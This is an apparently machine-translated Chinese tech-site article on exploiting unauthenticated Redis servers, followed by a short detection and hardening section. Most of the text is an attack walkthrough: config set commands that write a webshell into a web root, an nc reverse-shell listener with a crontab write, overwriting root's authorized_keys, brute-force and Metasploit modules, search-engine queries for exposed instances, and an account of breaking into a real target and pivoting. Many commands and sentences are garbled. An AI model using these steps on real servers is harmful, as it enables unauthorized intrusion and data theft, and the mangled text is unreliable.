Shulou(Shulou.com)05/31 Report--

This article is about how to understand Redis vulnerability exploitation and defense. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

Preface to Redis vulnerability exploitation and defense

Redis is widely used in large companies. Through the author's research, it is found that Redis unauthorized virus seems to attack automatically on the Internet. After a successful attack, the internal network will be scanned, controlled, infected and used for mining, extortion and other malicious acts. Early online analysis of an article "infected with the linux version of the extortion virus server through redis" (http://www.sohu.com/a/143409075_765820) If the company uses Redis, it should be paid attention to, through practical research, when under certain conditions, attackers can obtain webshell, or even root permissions.

Brief introduction of Redis and Construction of Experimental Environment

Remote Dictionary Server (Redis) is a key-value storage system written by Salvatore Sanfilippo. Redis is an open source log database written in ANSI C language, complies with BSD protocol, supports network, can be memory-based and persistent, Key-Value database, and provides API in multiple languages. It is often called a data structure server because the value can be of types such as String, Map, list, sets, and sorted sets. Since March 15, 2010, the development of Redis has been presided over by VMware. Since May 2013, the development of Redis has been sponsored by Pivotal. The latest stable version is 4.0.8.

Redis default Port

The default configuration port of Redis is 6379sentinel.conf configurator port is 26379

Official site

Https://redis.io/

Http://download.redis.io/releases/redis-3.2.11.tar.gz

Install redis http://download.redis.io/releases/redis-4.0.8.tar.gztar-xvf redis-4.0.8.tar.gz redis-4.0.8

The latest version of the previous vulnerability has been fixed, it is recommended to install version 3.2.11 during testing.

Modify the configuration file redis.conf redis.conf. / src/redis.confbind .0.0.1 with protected-mode set to no to start redis-server./src/redis-server redis.conf

After the latest version is successfully installed, it is shown in figure 1. The default configuration is to use port 6379 without a password. This will result in unauthorized access and then writing the file with redis permissions.

Figure 1 installation and configuration of redis

Interactive way to connect to a Redis server

Redis-cli-h {host}-p {port} is connected, and then all operations are implemented interactively, eliminating the need to execute redis-cli, such as commands:

Redis-cli. 0.0.1 color p plus-a parameter indicates the access command mode with password

Redis-cli-h {host}-p {port} {command} directly gets the return result of the command.

Common commands describe info view information flushall delete all database contents flushdb refresh database KEYS * view all keys, use select num to view key values data set test "who am i" setting variables config set dir dirpath setting paths, etc. Configure save save get variables view variable names

More commands can be found in the article: https://www.cnblogs.com/kongzhongqijing/p/6867960.html

Related loopholes

Improper configuration allows unauthorized access, and an attacker can access internal data without authentication, which can lead to disclosure of sensitive information (the Redis server stores some interesting session, cookie, or commercial data that can be enumerated through get), or it can maliciously execute flushall to clean up all data. The attacker can also execute lua code through EVAL, or write a backdoor file to disk through the data backup function. If Redis runs as root, you can write a SSH public key file to the root account and log in to the server directly without a password. The relevant vulnerability information is as follows:

Redis remote code execution vulnerability (CVE-2016-8339)

There is a buffer overflow vulnerability in Redis version 3.2.x < 3.2.4, which can lead to arbitrary code execution. There is an out-of-bounds write vulnerability in the handling of client-output-buffer-limit options in CONFIG SET commands stored in Redis data structures. Constructed CONFIG SET commands can result in out-of-bounds writing and code execution.

CVE-2015-8080

Redis 2.8.x before 2.8.24 and 3.0.x before 3.0.6, there is an integer overflow of getnum functions in lua_struct.c that allows context-sensitive attackers to license to run Lua code (memory corruption and application crash) or may bypass sandboxie restrictions to trigger stack-based buffer overflows.

CVE-2015-4335

Security vulnerabilities exist in Redis versions prior to 2.8.1 and 3.x prior to 3.0.2. Remote attackers can execute eval commands to exploit this vulnerability to execute arbitrary Lua bytecode

CVE-2013-7458

Read ".rediscli _ history" configuration file information

Redis attack idea Intranet port scan nmap-v-n-Pn-p 6379-sV-- scriptredis-info 192.168.56.1 Universe 24 reads its configuration file through file inclusion

The plaintext password is generally set in the Redis configuration file, and its configuration file can also be viewed through webshell during penetration. Redis often has more than one computer, which can be used to infiltrate the intranet or expand permissions.

Use the Redis brute force cracking tool

Https://github.com/evilpacket/redis-sha-crack, whose command is:

. / redis-sha-crack.js wordlist.txt shalist.txt .0.0.1 host2.example.com:5555

Node needs to be installed:

Clone https://github.com/nodejs/node.git. / configuremsf exploiting module auxiliary/scanner/redis/file_upload normal Redis File Uploadauxiliary/scanner/redis/redis_login normal Redis Login Utilityauxiliary/scanner/redis/redis_server normal Redis Command Execute ScannerRedis vulnerabilities to obtain webshell

When the redis permission is low and the server has web service on, if redis has write permission to the web directory, you can try to write webshell to the web path as long as you know the physical path. The simplified command is as follows:

Config dir E:/www/fontconfig dbfilename redis2.aspx a save bounce shell

(1) Connect to Redis server

Redis-cli-h 192.168.106.135-p 6379

(2) execute on 192.168.106.133

Nc-vlp 7999

(3) execute the following order

The x config dir / var/spool/cron/ubantu file is: / var/spool/cron/crontabs/config dir / var/spool/cron/crontabs/config dbfilename rootsave password-free login sshssh-keygen rsaconfig dir / root/.ssh/config dbfilename authorized_keys x save

The execution effect is shown in figure 2:

Figure 2Redis vulnerability SSH password-free login

Use vulnerability search engine to search

(1) search for "port: 6379"

Https://www.zoomeye.org/searchResult?q=port:6379

(2) remove the display "- NOAUTH Authentication required." Which indicates that authentication is required, that is, a password is required to access it

(3) https://fofa.so/

Keyword search: port= "6379" & & protocol==redis & & country=CN

Redis account acquires webshell actual combat

1. Scan the port information of a target server

Through the full port scan of a target server through nmap, it is found that the port on which the target opens Redis is 3357, and the default port is port 6379. Scan the port of the server on the same network segment again through the iis put scaner software, as shown in figure 3, get two servers that open this port.

Figure 3 scan the server with the port open on the same network segment

two。 Log in to the server using telnet

Log in using the command "telnet ip port" command, such as telnet 1 authentication. 76 3357. After logging in, enter auth and password to authenticate.

3. View and save the current configuration information.

Use the "config get command" to view the information of dir and dbfilename, and copy it down for later recovery.

Config get dirconfig get dbfilename

4. Configure and write to webshell

(1) set the path

Config set dir E:/www/font

(2) set the database name

Set the name of the dbfilename pair to a file that supports script types. For example, if the website supports php, you can set file.php. In this case, it is aspx, so set redis.aspx.

Config set dbfilename redis.aspx

(3) set the content of webshell

To set the content of webshell according to the actual situation, webshell is only a variable and can be any other characters such as a. Here are some reference examples.

Set webshell "/ / php View Information set webshell" / / phpwebshellset webshell "/ / aspx's webshell, note the use of double quotes\"

(4) Save the written content

Save

(5) View the contents of webshell

Get webshell

The complete process execution command is shown in figure 4, and each command showing "+ OK" indicates that the configuration is successful.

Figure 4 write to webshell

Test whether the webshell is normal

Enter the name of the corresponding written file in the browser and access it as shown in figure 5, and something like this appears:

"REDIS0006?webshell'a@H ?" Indicates that the webshell is obtained correctly.

Figure 5 Test whether webshell is normal or not

6. Get webshell

As shown in figure 6, the webshell of the website was successfully obtained by using the Chinese kitchen knife back door management connection tool.

Figure 6. Get webshell

7. Restore the original settin

(1) restore dir

Config set dir dirname

(2) restore dbfilename

Config set dbfilename dbfilename

(3) Delete webshell

Del webshell

(4) refresh the database

Flushdb

8. Complete command summary

* .31 auth config dirconfig dbfilenameconfig dir E:/www/config dbfilename redis2.aspx a save a

9. View the redis configuration conf file

Through webshell, it is found that there are other redis addresses in its corresponding directory, which can be infiltrated again by the same method. As shown in figure 7, you can see the path, port, password and other information.

Figure 7 View redis and its configuration file

Redis intrusion Detection and Security Prevention intrusion Detection Detection key

Log in locally and check through the "keys *" command. If there is an intrusion, there will be a lot of values, as shown in figure 8. After the successful execution of keys *, you can see that there are trojan1 and trojan2 commands, and execute get trojan1 to view them.

Figure 8 check keys

Authorized_keys needs to be checked under linux

Redis has a built-in key named crackit, which can also be other values. At the same time, the dir parameter in the conf file of Redis points to / root/.ssh, and / root/.ssh/authorized_keys is overwritten or contains Redis-related content. Check its value until it has been invaded.

Webshell scanning and analysis of the website

If you find that you take advantage of the loopholes in your Redis account, you will use the words Redis in Zhonghui Village of shell.

Check the back door of the server and repair it.

(1) prohibit the opening of Redis ports on public networks. You can disable 6379 Redis ports on the firewall.

(2) check whether the authorized_keys is illegal. If it has been modified, it can be regenerated and restored, and the modified file cannot be used. And restart the ssh service (service ssh restart)

(3) add Redis password authentication

First stop the REDIS service, open the redis.conf configuration file (different configuration files may have different paths) / etc/redis/6379.conf, find # requirepass foobared, remove the previous #, then change foobared to your own password, and restart the redis service.

(4) modify the conf file to prohibit access to the whole network. Open the 6379.conf file and add # before finding the bind0.0.0.0 (no access to the whole network).

Can refer to the hardening modification command to describe port modify the default port used by redis bind to set the private IPrequirepass for redis listening to set the password for redis connection rename-command CONFIG "disable CONFIG command rename-command info info2 rename info to info2 above is how to understand Redis vulnerability exploitation and defense, Xiaobian believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.